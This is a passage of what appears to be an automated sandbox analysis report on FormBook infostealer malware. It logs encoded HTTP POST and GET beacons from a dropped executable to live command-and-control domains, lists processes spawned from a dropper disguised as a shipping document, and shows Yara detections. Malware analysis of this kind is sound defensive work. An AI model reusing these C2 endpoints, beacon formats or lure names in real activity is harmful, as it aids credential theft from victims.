                                                          Jul 26, 2024 18:47:45.474972963 CEST | 1120 | IN | Data Raw: 20 33 2e 37 37 30 39 31 36 2c 30 2e 35 33 30 32 34 20 37 2e 38 39 36 35 37 2c 30 2e 37 36 35 39 39 20 31 31 2e 36 30 38 35 33 35 2c 30 2e 38 38 33 38 32 20 33 2e 37 31 31 39 36 35 2c 30 2e 31 31 37 38 32 20 37 2e 30 31 32 35 34 38 2c 30 2e 31 31
                                                          Data Ascii: 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,-0.0589 7.425155,-0.0589 11.137027,-0.23569 3.711875,-0.17679 7.366225,-0.530
                                                          Jul 26, 2024 18:47:45.478755951 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20
                                                          Data Ascii: rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterl
                                                          Jul 26, 2024 18:47:45.478769064 CEST | 1236 | IN | Data Raw: 2d 31 38 2e 35 39 34 36 33 2c 32 37 2e 32 34 36 30 36 20 2d 38 2e 33 38 34 37 37 2c 33 2e 37 35 39 20 31 2e 33 35 31 39 39 2c 2d 33 2e 31 31 30 31 36 20 35 2e 36 39 35 31 33 2c 2d 31 32 2e 38 39 38 38 31 20 31 30 2e 35 30 36 30 39 2c 2d 31 35 2e
                                                          Data Ascii: -18.59463,27.24606 -8.38477,3.759 1.35199,-3.11016 5.69513,-12.89881 10.50609,-15.15612 8.05545,-3.77965 6.61702,-3.26121 6.61702,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          26 | 192.168.2.5 | 55164 | 162.254.38.56 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 26, 2024 18:47:47.378555059 CEST | 730 | OUT | POST /hheq/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.gridban.xyz
                                                          Origin: http://www.gridban.xyz
                                                          Referer: http://www.gridban.xyz/hheq/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 44 53 76 44 51 2b 45 79 6a 4d 30 52 32 74 4e 4a 38 77 70 75 36 69 46 37 75 59 48 67 35 34 41 50 41 66 43 53 51 66 32 6d 6d 31 5a 45 66 58 6a 36 66 44 49 61 6c 79 4d 74 41 57 50 6f 6f 6e 50 37 4c 42 55 59 68 34 43 55 52 39 35 65 46 65 4d 54 33 4b 50 36 44 52 4a 2b 45 4b 46 2f 58 77 33 42 36 6e 5a 7a 38 70 2b 72 47 41 74 53 64 78 59 31 41 4f 48 74 71 38 38 4d 55 51 32 65 63 2f 66 49 37 41 6d 36 45 4d 6d 64 6d 77 48 5a 32 59 46 68 45 6a 77 70 34 4e 46 51 6c 33 63 43 6c 57 61 42 39 37 50 56 30 31 4f 4a 50 4a 47 34 4e 74 79 71 4c 61 37 4a 4e 51 41 68 56 70 42 65 62 48 34 7a 70 46 6e 47 52 4f 68 6e 39 4c 31 64 65 34 36 6a 79 4b 6e 43 36 65 31 43 5a 54 58 64
                                                          Data Ascii: 1Hg=DSvDQ+EyjM0R2tNJ8wpu6iF7uYHg54APAfCSQf2mm1ZEfXj6fDIalyMtAWPoonP7LBUYh4CUR95eFeMT3KP6DRJ+EKF/Xw3B6nZz8p+rGAtSdxY1AOHtq88MUQ2ec/fI7Am6EMmdmwHZ2YFhEjwp4NFQl3cClWaB97PV01OJPJG4NtyqLa7JNQAhVpBebH4zpFnGROhn9L1de46jyKnC6e1CZTXd
                                                          Jul 26, 2024 18:47:47.980654001 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:47 GMT
                                                          Server: Apache
                                                          Content-Length: 16052
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                          Jul 26, 2024 18:47:47.981376886 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                          Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                          Jul 26, 2024 18:47:47.981389046 CEST | 1236 | IN | Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                          Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                          Jul 26, 2024 18:47:47.984262943 CEST | 1236 | IN | Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                          Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                          Jul 26, 2024 18:47:47.984273911 CEST | 1236 | IN | Data Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                          Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                          Jul 26, 2024 18:47:47.987487078 CEST | 1236 | IN | Data Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                                          Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                                          Jul 26, 2024 18:47:47.987498045 CEST | 1236 | IN | Data Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                          Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                                          Jul 26, 2024 18:47:47.990753889 CEST | 1236 | IN | Data Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                                          Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
                                                          Jul 26, 2024 18:47:47.990765095 CEST | 1236 | IN | Data Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33
                                                          Data Ascii: 1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                          Jul 26, 2024 18:47:47.993859053 CEST | 1236 | IN | Data Raw: 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72
                                                          Data Ascii: ll-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567"
                                                          Jul 26, 2024 18:47:47.994389057 CEST | 1236 | IN | Data Raw: 2c 30 2e 31 31 38 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65
                                                          Data Ascii: ,0.1183" style="fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4578-1"


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          27 | 192.168.2.5 | 55165 | 162.254.38.56 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 26, 2024 18:47:49.961024046 CEST | 1747 | OUT | POST /hheq/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1240
                                                          Host: www.gridban.xyz
                                                          Origin: http://www.gridban.xyz
                                                          Referer: http://www.gridban.xyz/hheq/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: 1Hg= [TRUNCATED]
                                                          Jul 26, 2024 18:47:50.654274940 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:50 GMT
                                                          Server: Apache
                                                          Content-Length: 16052
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          28 | 192.168.2.5 | 55166 | 162.254.38.56 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 26, 2024 18:47:52.552531004 CEST | 465 | OUT | GET /hheq/?1Hg=OQHjTIEzxI4+3uBJ4Ch4/gBE3u2u+7BoOuCOJurFjFRPYCarRFUfzgF9IWvn7XTpBRUAmOCVXs1kY9Zsut6EdHJsI9AJbTCs7iVD1ouYIWNqRmE7fP7CptgJfBKNW9KUkg==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.gridban.xyz
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Jul 26, 2024 18:47:53.160244942 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:53 GMT
                                                          Server: Apache
                                                          Content-Length: 16052
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          29 | 192.168.2.5 | 55167 | 142.171.29.133 | 80 | 7156 | C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 26, 2024 18:47:58.348274946 CEST | 734 | OUT | POST /jug9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.xawcfzcql9tcvj.shop
                                                          Origin: http://www.xawcfzcql9tcvj.shop
                                                          Referer: http://www.xawcfzcql9tcvj.shop/jug9/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: 1Hg=FUfaEv5pGrv3AfRNdXqxYoOvLQAy4Q0CDyY7zYhpTy8S8pfwLMCf75T6WTHGwByOZaImwSAXUzVehzE1+dUdM+T5kKDoBp9+TP/RiRVFg2+SGFMsInjsWryK0sB2dW7K+WhLrzI20GRBoi/TSgg0Tzu42xCIgymnWfqVca3am1ohDecQ0552zV63SH9GyXGRVVaAQvY=
                                                          Jul 26, 2024 18:47:58.931396008 CEST | 433 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:47:58 GMT
                                                          Server: Apache
                                                          Content-Length: 269
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.xawcfzcql9tcvj.shop Port 80</address></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          30 | 192.168.2.5 | 55168 | 142.171.29.133 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 26, 2024 18:48:01.433706045 CEST | 754 | OUT | POST /jug9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.xawcfzcql9tcvj.shop
                                                          Origin: http://www.xawcfzcql9tcvj.shop
                                                          Referer: http://www.xawcfzcql9tcvj.shop/jug9/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: 1Hg=FUfaEv5pGrv3D+BNfw2xfIOwHwAyhA04DyE7zaN5QBYS9LHwKNCf65T6ODHH+hyBZaUuwQkXUzpehyY1+qASDOT386DqFp9+TP/RiRBjg2mSG08saT3vfLyNkcB2LW7O+Wh9ryVj0AVBog3TRxg3dzu65RDjpy3RQ5ilQ4uFlkIsGox6ubxeg1WPCU1xjnn4P2KwO4O29mvjm5eXERGLPz5IuCsY
                                                          Jul 26, 2024 18:48:02.001708031 CEST | 433 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 26 Jul 2024 16:48:01 GMT
                                                          Server: Apache
                                                          Content-Length: 269
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.xawcfzcql9tcvj.shop Port 80</address></body></html>


                                                          Target ID:0
                                                          Start time:12:44:52
                                                          Start date:26/07/2024
                                                          Path:C:\Users\user\Desktop\Final Shipping Document.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Final Shipping Document.exe"
                                                          Imagebase:0xba0000
                                                          File size:1'225'216 bytes
                                                          MD5 hash:2D3ECAF3008E1D47782F668F713B35B1
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:12:44:53
                                                          Start date:26/07/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Final Shipping Document.exe"
                                                          Imagebase:0x5e0000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:12:45:19
                                                          Start date:26/07/2024
                                                          Path:C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe"
                                                          Imagebase:0x1a0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:5
                                                          Start time:12:45:20
                                                          Start date:26/07/2024
                                                          Path:C:\Windows\SysWOW64\gpupdate.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\gpupdate.exe"
                                                          Imagebase:0xa90000
                                                          File size:25'088 bytes
                                                          MD5 hash:6DC3720EA74B49C8ED64ACA3E0162AC8
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:7
                                                          Start time:12:45:43
                                                          Start date:26/07/2024
                                                          Path:C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe"
                                                          Imagebase:0x1a0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:8
                                                          Start time:12:45:57
                                                          Start date:26/07/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff79f9e0000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:3.1%
                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                            Signature Coverage:3%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:63
